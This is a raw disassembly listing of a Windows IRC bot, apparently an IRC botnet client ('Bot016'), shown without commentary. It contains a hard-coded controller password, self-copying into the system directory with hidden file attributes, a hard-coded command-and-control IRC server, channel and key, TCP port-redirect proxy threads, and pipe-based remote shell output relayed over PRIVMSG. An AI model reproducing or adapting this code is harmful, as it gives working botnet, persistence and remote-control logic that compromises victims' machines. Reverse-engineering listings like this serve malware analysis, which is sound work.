push offset asc_425BBC ; "~"
push eax
call sub_415459
mov edi, [ebp+var_C]
mov ebx, eax
add esp, 18h
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40E593: ; CODE XREF: sub_408A18+5B97�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_40E5B5
test cl, cl
jz short loc_40E5B1
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_40E5B5
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_40E593
loc_40E5B1: ; CODE XREF: sub_408A18+5B85�j
xor eax, eax
jmp short loc_40E5BA
; ---------------------------------------------------------------------------
loc_40E5B5: ; CODE XREF: sub_408A18+5B81�j
; sub_408A18+5B8F�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40E5BA: ; CODE XREF: sub_408A18+5B9B�j
test eax, eax
jz short loc_40E609
push ebx
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_4056B0
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_4056B0
push ebx
push esi
push offset aMainFailedPass ; "[MAIN]: *Failed pass auth by: (%s!%s)."
loc_40E5F5: ; CODE XREF: sub_408A18+5C44�j
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
add esp, 30h
jmp loc_40DA31
; ---------------------------------------------------------------------------
loc_40E609: ; CODE XREF: sub_408A18+5BA4�j
xor edi, edi
loc_40E60B: ; CODE XREF: sub_408A18+5C0B�j
push ebx
push off_42BFB0[edi]
call sub_412B6F
test eax, eax
pop ecx
pop ecx
jnz short loc_40E65E
add edi, 4
cmp edi, 4
jb short loc_40E60B
push ebx
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_4056B0
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_4056B0
push ebx
push esi
push offset aMainFailedHost ; "[MAIN]: *Failed host auth by: (%s!%s)."
jmp short loc_40E5F5
; ---------------------------------------------------------------------------
loc_40E65E: ; CODE XREF: sub_408A18+5C03�j
mov edx, [ebp+arg_18]
xor eax, eax
loc_40E663: ; CODE XREF: sub_408A18+5C8D�j
cmp byte ptr [edx], 0
jnz short loc_40E69B
mov edi, [ebp+var_C]
mov esi, offset aN3m3s1s ; "n3m3s1s"
loc_40E670: ; CODE XREF: sub_408A18+5C74�j
mov bl, [esi]
mov cl, bl
cmp bl, [edi]
jnz short loc_40E692
test cl, cl
jz short loc_40E68E
mov bl, [esi+1]
mov cl, bl
cmp bl, [edi+1]
jnz short loc_40E692
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_40E670
loc_40E68E: ; CODE XREF: sub_408A18+5C62�j
xor ecx, ecx
jmp short loc_40E697
; ---------------------------------------------------------------------------
loc_40E692: ; CODE XREF: sub_408A18+5C5E�j
; sub_408A18+5C6C�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_40E697: ; CODE XREF: sub_408A18+5C78�j
test ecx, ecx
jz short loc_40E6AC
loc_40E69B: ; CODE XREF: sub_408A18+5C4E�j
inc eax
add edx, 80h
cmp eax, 2
jl short loc_40E663
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40E6AC: ; CODE XREF: sub_408A18+5C81�j
shl eax, 7
add eax, [ebp+arg_18]
push 7Fh
lea ecx, [ebp+var_B40]
push ecx
push eax
call sub_414670
add esp, 0Ch
cmp [ebp+var_8], 0
jnz short loc_40E6E5
push 0
push [ebp+var_4]
push offset aMainPasswordAc ; "[MAIN]: Password accepted."
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
loc_40E6E5: ; CODE XREF: sub_408A18+5CB0�j
lea eax, [ebp+var_F0]
push eax
push offset aMainUserSLog_1 ; "[MAIN]: User: %s logged in."
loc_40E6F1: ; CODE XREF: sub_408A18+6F5�j
; sub_408A18+4A64�j ...
call sub_401F73
pop ecx
loc_40E6F7: ; CODE XREF: sub_408A18+36C6�j
pop ecx
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40E6FD: ; CODE XREF: sub_408A18+1FA�j
; sub_408A18+20D�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_4056B0
push offset aIx ; "+ix"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_4056B0
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_4056B0
xor eax, eax
add esp, 2Ch
inc eax
mov dword_47BF04, eax
jmp loc_408C99
sub_408A18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E745 proc near ; CODE XREF: .text:00416465�p
var_98C = byte ptr -98Ch
var_888 = byte ptr -888h
var_887 = byte ptr -887h
var_6F8 = byte ptr -6F8h
var_5F8 = byte ptr -5F8h
var_4F8 = byte ptr -4F8h
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_1EC = byte ptr -1ECh
var_E8 = byte ptr -0E8h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98Ch
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_402E99
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_420004
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_47BEF8, eax
call esi ; GetTickCount
push eax
call sub_414794
pop ecx
call sub_4057AC
push 2
call dword_4357C0 ; SetErrorMode
push 7530h
push offset aBot016 ; "Bot016"
push ebx
push ebx
call ds:dword_420104 ; CreateMutexA
push eax
call ds:dword_420100 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40E7C4
push 1
jmp loc_40EA24
; ---------------------------------------------------------------------------
loc_40E7C4: ; CODE XREF: sub_40E745+76�j
lea eax, [ebp+var_888]
push eax
push 202h
call dword_4357F8 ; WSAStartup
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_40EC91
cmp [ebp+var_888], 2
jnz loc_40EC8B
cmp [ebp+var_887], 2
jnz loc_40EC8B
mov esi, 104h
push esi
lea eax, [ebp+var_3F4]
push eax
call ds:dword_420048 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_2F0]
push eax
push ebx
call ds:dword_4200A4 ; GetModuleHandleA
push eax
call ds:dword_420010 ; GetModuleFileNameA
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push ebx
lea eax, [ebp+var_2F0]
push ebx
push eax
call sub_415D0D
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_4F8]
push esi
push eax
call sub_41483D
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_4150B0
add esp, 30h
test eax, eax
jnz loc_40EA2A
cmp dword_47BEFC, ebx
mov esi, offset byte_42BF44
jz short loc_40E8CC
mov eax, esi
xor edi, edi
lea ecx, [eax+1]
loc_40E892: ; CODE XREF: sub_40E745+152�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40E892
sub eax, ecx
add eax, 0FFFFFFFAh
test eax, eax
jbe short loc_40E8CC
loc_40E8A2: ; CODE XREF: sub_40E745+185�j
call sub_4147A1
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, esi
lea ecx, [eax+1]
add dl, 61h
mov byte_42BF44[edi], dl
inc edi
loc_40E8BC: ; CODE XREF: sub_40E745+17C�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40E8BC
sub eax, ecx
add eax, 0FFFFFFFAh
cmp edi, eax
jb short loc_40E8A2
loc_40E8CC: ; CODE XREF: sub_40E745+144�j
; sub_40E745+15B�j
push esi
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_1EC]
push offset aSS_0 ; "%s\\%s"
push eax
call sub_4145E5
add esp, 10h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_4200A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40E90C
push 80h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_4200CC ; SetFileAttributesA
loc_40E90C: ; CODE XREF: sub_40E745+1B3�j
mov esi, ds:dword_420000
push 7D0h
call esi ; Sleep
mov edi, ds:dword_4200FC
mov [ebp+var_4], ebx
jmp short loc_40E947
; ---------------------------------------------------------------------------
loc_40E924: ; CODE XREF: sub_40E745+215�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp [ebp+var_4], ebx
jnz short loc_40E95C
cmp eax, 20h
jz short loc_40E939
cmp eax, 5
jnz short loc_40E95C
loc_40E939: ; CODE XREF: sub_40E745+1ED�j
push 3A98h
mov [ebp+var_4], 1
call esi ; Sleep
loc_40E947: ; CODE XREF: sub_40E745+1DD�j
push ebx
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_2F0]
push eax
call edi ; CopyFileA
test eax, eax
jz short loc_40E924
loc_40E95C: ; CODE XREF: sub_40E745+1E8�j
; sub_40E745+1F2�j
lea eax, [ebp+var_1EC]
push eax
call sub_40696D
pop ecx
push 7
lea eax, [ebp+var_1EC]
push eax
call ds:dword_4200CC ; SetFileAttributesA
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
xor edi, edi
inc edi
mov [ebp+var_5C], 420AEAh
mov [ebp+var_68], 44h
mov [ebp+var_3C], edi
mov [ebp+var_38], bx
call ds:dword_4200F8 ; GetCurrentProcessId
push eax
push edi
push 100000h
call ds:dword_420078 ; OpenProcess
lea ecx, [ebp+var_2F0]
push ecx
push eax
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_98C]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_4145E5
add esp, 14h
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_3F4]
push eax
push ebx
push 28h
push edi
push ebx
push ebx
lea eax, [ebp+var_98C]
push eax
lea eax, [ebp+var_1EC]
push eax
call ds:dword_420038 ; CreateProcessA
test eax, eax
jz short loc_40EA30
push 0C8h
call esi ; Sleep
push [ebp+var_24]
mov esi, ds:dword_42003C
call esi ; CloseHandle
push [ebp+var_20]
call esi ; CloseHandle
call dword_435900 ; WSACleanup
push ebx
loc_40EA24: ; CODE XREF: sub_40E745+7A�j
call ds:dword_420034 ; ExitProcess
loc_40EA2A: ; CODE XREF: sub_40E745+133�j
mov esi, ds:dword_420000
loc_40EA30: ; CODE XREF: sub_40E745+2BF�j
cmp dword_47C1B8, 2
jle short loc_40EA78
mov eax, dword_47C1BC
push dword ptr [eax+4]
call sub_414972
pop ecx
mov edi, eax
push 0FFFFFFFFh
push edi
call ds:dword_420100 ; WaitForSingleObject
push edi
call ds:dword_42003C ; CloseHandle
mov eax, dword_47C1BC
cmp [eax+8], ebx
jz short loc_40EA78
push 7D0h
call esi ; Sleep
mov eax, dword_47C1BC
push dword ptr [eax+8]
call ds:dword_4200E4 ; DeleteFileA
loc_40EA78: ; CODE XREF: sub_40E745+2F2�j
; sub_40E745+31C�j
cmp dword_42BECC, ebx
jz short loc_40EA95
cmp dword_435948, ebx
jnz short loc_40EA95
lea eax, [ebp+var_4F8]
push eax
call sub_40213F
pop ecx
loc_40EA95: ; CODE XREF: sub_40E745+339�j
; sub_40E745+341�j
lea eax, [ebp+var_E8]
push offset aMainBotStarted ; "[MAIN]: Bot started."
push eax
call sub_4145E5
push ebx
lea eax, [ebp+var_E8]
push ebx
push eax
call sub_412471
lea eax, [ebp+var_E8]
push eax
call sub_401EFF
xor eax, eax
mov ecx, 2E0h
mov edi, offset dword_47B378
rep stosd
lea eax, [ebp+var_E8]
push offset aSecureSystemSe ; "[SECURE]: System secure monitor active."...
push eax
call sub_4145E5
push ebx
lea eax, [ebp+var_E8]
push 1Ah
push eax
call sub_412471
add esp, 2Ch
mov edi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push ebx
push offset sub_41055B
push ebx
push ebx
call ds:dword_42000C ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_436694[edi], eax
jnz short loc_40EB31
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_E8]
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
push eax
call sub_4145E5
add esp, 0Ch
loc_40EB31: ; CODE XREF: sub_40E745+3CF�j
lea eax, [ebp+var_E8]
push eax
call sub_401EFF
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push offset dword_47B214
mov dword_47BF08, ebx
call sub_414670
mov eax, dword_42BEB0
push 3Fh
push offset aHell ; "#hell"
mov esi, offset dword_47B294
push esi
mov dword_47B364, eax
call sub_414670
push 3Fh
push offset aTroopers ; "troopers"
mov edi, offset dword_47B2D4
push edi
call sub_414670
add esp, 28h
mov dword_47B368, ebx
loc_40EB8B: ; CODE XREF: sub_40E745+4EC�j
; sub_40E745+4F7�j ...
mov [ebp+var_4], ebx
loc_40EB8E: ; CODE XREF: sub_40E745+4A0�j
cmp dword_435960, ebx
jnz short loc_40EBAC
push ebx
lea eax, [ebp+var_14]
push eax
call dword_435770 ; InternetGetConnectedState
test eax, eax
jnz short loc_40EBAC
push 7530h
jmp short loc_40EBD8
; ---------------------------------------------------------------------------
loc_40EBAC: ; CODE XREF: sub_40E745+44F�j
; sub_40E745+45E�j
push offset dword_47B210
mov dword_47BF04, ebx
call sub_4088B9
cmp eax, 2
mov [ebp+var_8], eax
jz loc_40EC86
cmp dword_47BF04, ebx
jz short loc_40EBD3
dec [ebp+var_4]
loc_40EBD3: ; CODE XREF: sub_40E745+489�j
push 0BB8h
loc_40EBD8: ; CODE XREF: sub_40E745+465�j
call ds:dword_420000 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 3
jl short loc_40EB8E
cmp [ebp+var_8], 2
jz loc_40EC86
cmp [ebp+var_C], ebx
jz short loc_40EC36
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push offset dword_47B214
call sub_414670
mov eax, dword_42BEB0
push 3Fh
push offset aHell ; "#hell"
push esi
mov dword_47B364, eax
call sub_414670
push 3Fh
push offset aTroopers ; "troopers"
push edi
call sub_414670
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_40EB8B
; ---------------------------------------------------------------------------
loc_40EC36: ; CODE XREF: sub_40E745+4AF�j
cmp byte_42BF20, bl
jz loc_40EB8B
push 7Fh
push offset byte_42BF20
push offset dword_47B214
call sub_414670
mov eax, dword_42BEB4
push 3Fh
push offset dword_42BF30
push esi
mov dword_47B364, eax
call sub_414670
push 3Fh
push offset aTroopers_0 ; "troopers"
push edi
call sub_414670
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40EB8B
; ---------------------------------------------------------------------------
loc_40EC86: ; CODE XREF: sub_40E745+47D�j
; sub_40E745+4A6�j
call sub_4125E2
loc_40EC8B: ; CODE XREF: sub_40E745+A3�j
; sub_40E745+B0�j
call dword_435900 ; WSACleanup
loc_40EC91: ; CODE XREF: sub_40E745+96�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40E745 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EC9A proc near ; DATA XREF: sub_40ED35+12C�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_414800
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov ebx, 1000h
jmp short loc_40ECEF
; ---------------------------------------------------------------------------
loc_40ECD4: ; CODE XREF: sub_40EC9A+7B�j
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_43668C[esi]
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz short loc_40ED17
loc_40ECEF: ; CODE XREF: sub_40EC9A+38�j
xor eax, eax
push eax
lea edi, [ebp+var_1128]
mov ecx, 400h
rep stosd
push ebx
lea eax, [ebp+var_1128]
push eax
push dword_436690[esi]
call dword_43575C ; recv
test eax, eax
jg short loc_40ECD4
loc_40ED17: ; CODE XREF: sub_40EC9A+53�j
push dword_436690[esi]
call dword_4358F4 ; closesocket
push [ebp+var_14]
call sub_412735
pop ecx
push 0
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40EC9A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40ED35 proc near ; DATA XREF: sub_40EF12+118�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_414800
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_144]
rep movsd
mov esi, [ebp+var_30]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+var_4], esi
call dword_4357E8 ; socket
xor ebx, ebx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_40EE94
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
mov [ebp+var_18], 2
call dword_435934 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_43585C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40EDBD
lea eax, [ebp+var_13C]
push eax
call dword_435848 ; gethostbyname
jmp short loc_40EDCB
; ---------------------------------------------------------------------------
loc_40EDBD: ; CODE XREF: sub_40ED35+77�j
push 2
push 4
lea eax, [ebp+var_8]
push eax
call dword_4358D8 ; gethostbyaddr
loc_40EDCB: ; CODE XREF: sub_40ED35+86�j
cmp eax, ebx
jz loc_40EE94
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
push 10h
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call dword_4357A0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40EE94
push [ebp+var_34]
movzx eax, [ebp+var_16]
push eax
push [ebp+var_14]
mov [ebp+var_20], ebx
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset aRedirectClient ; "[REDIRECT]: Client connection to IP: %s"...
push eax
call sub_4145E5
push [ebp+arg_0]
lea eax, [ebp+var_344]
push 11h
push eax
call sub_412471
imul esi, 234h
mov ecx, [ebp+var_34]
mov [ebp+var_30], eax
imul eax, 234h
mov dword_436684[eax], ecx
add esp, 20h
lea esi, dword_43668C[esi]
mov ecx, [esi]
mov dword_436690[eax], ecx
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_144]
push eax
push offset sub_40EC9A
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, ebx
mov dword_436694[ecx], eax
jnz short loc_40EECA
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_0 ; "[REDIRECT]: Failed to start connection "...
call sub_401F73
pop ecx
pop ecx
loc_40EE94: ; CODE XREF: sub_40ED35+42�j
; sub_40ED35+98�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_43668C[eax]
call dword_4358F4 ; closesocket
push [ebp+arg_0]
call dword_4358F4 ; closesocket
push [ebp+var_4]
call sub_412735
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
loc_40EEC2: ; CODE XREF: sub_40ED35+198�j
push 32h
call ds:dword_420000 ; Sleep
loc_40EECA: ; CODE XREF: sub_40ED35+14A�j
cmp [ebp+var_20], ebx
jz short loc_40EEC2
jmp short loc_40EEE8
; ---------------------------------------------------------------------------
loc_40EED1: ; CODE XREF: sub_40ED35+1D9�j
push ebx
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz short loc_40EE94
loc_40EEE8: ; CODE XREF: sub_40ED35+19A�j
xor eax, eax
push ebx
lea edi, [ebp+var_1344]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+var_1344]
push eax
push dword ptr [esi]
call dword_43575C ; recv
cmp eax, ebx
jg short loc_40EED1
jmp short loc_40EE94
sub_40ED35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF12 proc near ; DATA XREF: sub_408A18+2778�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 4Ah
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push [ebp+var_40]
xor esi, esi
inc esi
mov [eax+120h], esi
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_435934 ; ntohs
push 6
push esi
xor ebx, ebx
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], ebx
mov [ebp+arg_0], 10h
call dword_4357E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_40F071
mov eax, [ebp+var_3C]
imul eax, 234h
push esi
push 401h
push ebx
push edi
mov dword_43668C[eax], edi
call dword_435874 ; WSAAsyncSelect
push 10h
lea eax, [ebp+var_10]
push eax
push edi
call dword_4358C0 ; bind
test eax, eax
jnz loc_40F071
push 0Ah
push edi
call dword_435908 ; listen
test eax, eax
jnz loc_40F071
loc_40EFB8: ; CODE XREF: sub_40EF12+BA�j
; sub_40EF12+15A�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_4357AC ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40EFB8
push [ebp+var_3C]
movzx eax, [ebp+var_22]
push eax
push [ebp+var_20]
mov [ebp+var_148], esi
mov [ebp+var_2C], ebx
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset aRedirectClie_0 ; "[REDIRECT]: Client connection from IP: "...
push eax
call sub_4145E5
push esi
lea eax, [ebp+var_34C]
push 11h
push eax
call sub_412471
mov ecx, [ebp+var_3C]
mov [ebp+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_436684[eax], ecx
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_14C]
push eax
push offset sub_40ED35
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, ebx
mov dword_436694[ecx], eax
jnz short loc_40F067
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_1 ; "[REDIRECT]: Failed to start client thre"...
call sub_401F73
pop ecx
pop ecx
jmp short loc_40F074
; ---------------------------------------------------------------------------
loc_40F05F: ; CODE XREF: sub_40EF12+158�j
push 32h
call ds:dword_420000 ; Sleep
loc_40F067: ; CODE XREF: sub_40EF12+136�j
cmp [ebp+var_2C], ebx
jz short loc_40F05F
jmp loc_40EFB8
; ---------------------------------------------------------------------------
loc_40F071: ; CODE XREF: sub_40EF12+5D�j
; sub_40EF12+8F�j ...
mov esi, [ebp+arg_0]
loc_40F074: ; CODE XREF: sub_40EF12+14B�j
push esi
call dword_4358F4 ; closesocket
push edi
call dword_4358F4 ; closesocket
push [ebp+var_3C]
call sub_412735
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40EF12 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F093 proc near ; CODE XREF: sub_40F0C3+30�p
; sub_40F101+85�p ...
mov eax, dword_47BF18
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_42003C
jz short loc_40F0A7
push eax
call esi ; CloseHandle
loc_40F0A7: ; CODE XREF: sub_40F093+F�j
mov eax, dword_47BF14
cmp eax, 0FFFFFFFFh
jz short loc_40F0B4
push eax
call esi ; CloseHandle
loc_40F0B4: ; CODE XREF: sub_40F093+1C�j
mov eax, dword_47BF50
cmp eax, 0FFFFFFFFh
jz short loc_40F0C1
push eax
call esi ; CloseHandle
loc_40F0C1: ; CODE XREF: sub_40F093+29�j
pop esi
retn
sub_40F093 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F0C3 proc near ; CODE XREF: sub_408A18+3878�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_40F0CD: ; CODE XREF: sub_40F0C3+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F0CD
push 0
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
push [ebp+arg_0]
mov [ebp+var_4], eax
push dword_47BF0C
call ds:dword_420040 ; WriteFile
test eax, eax
jnz short loc_40F0FC
call sub_40F093
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40F0FC: ; CODE XREF: sub_40F0C3+2E�j
xor eax, eax
inc eax
leave
retn
sub_40F0C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F101 proc near ; CODE XREF: sub_40F18F+D9�p
; sub_40F18F+11F�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
mov esi, [ebp+arg_4]
xor ecx, ecx
push edi
inc ecx
mov edi, 420AEAh
xor eax, eax
repe cmpsb
pop edi
pop esi
jz short loc_40F146
push 0FAh
call ds:dword_420000 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_4145E5
add esp, 10h
jmp short loc_40F15D
; ---------------------------------------------------------------------------
loc_40F146: ; CODE XREF: sub_40F101+1C�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_2 ; "%s"
push eax
call sub_4145E5
add esp, 0Ch
loc_40F15D: ; CODE XREF: sub_40F101+43�j
lea eax, [ebp+var_200]
lea edx, [eax+1]
loc_40F166: ; CODE XREF: sub_40F101+6A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F166
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43587C ; send
test eax, eax
jg short loc_40F18B
call sub_40F093
loc_40F18B: ; CODE XREF: sub_40F101+83�j
xor eax, eax
leave
retn
sub_40F101 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F18F proc near ; DATA XREF: sub_40F31C+16A�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
xor eax, eax
mov ebx, 80h
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
xor edi, edi
push edi
push edi
lea eax, [ebp+var_4]
push eax
mov esi, 200h
push esi
lea eax, [ebp+var_20C]
push eax
push dword_47BF18
call ds:dword_42010C ; PeekNamedPipe
test eax, eax
jz loc_40F29E
jmp short loc_40F1D9
; ---------------------------------------------------------------------------
loc_40F1D7: ; CODE XREF: sub_40F18F+109�j
xor edi, edi
loc_40F1D9: ; CODE XREF: sub_40F18F+46�j
cmp [ebp+var_4], edi
jnz short loc_40F209
lea eax, [ebp+var_8]
push eax
push dword_47BF50
call ds:dword_420108 ; GetExitCodeProcess
test eax, eax
jz short loc_40F1FF
cmp [ebp+var_8], 103h
jnz loc_40F2CB
loc_40F1FF: ; CODE XREF: sub_40F18F+61�j
push 0Ah
call ds:dword_420000 ; Sleep
jmp short loc_40F270
; ---------------------------------------------------------------------------
loc_40F209: ; CODE XREF: sub_40F18F+4D�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_40F224
loc_40F210: ; CODE XREF: sub_40F18F+93�j
cmp [ebp+eax+var_20C], 0Ah
jz loc_40F2C2
inc eax
cmp eax, [ebp+var_4]
jb short loc_40F210
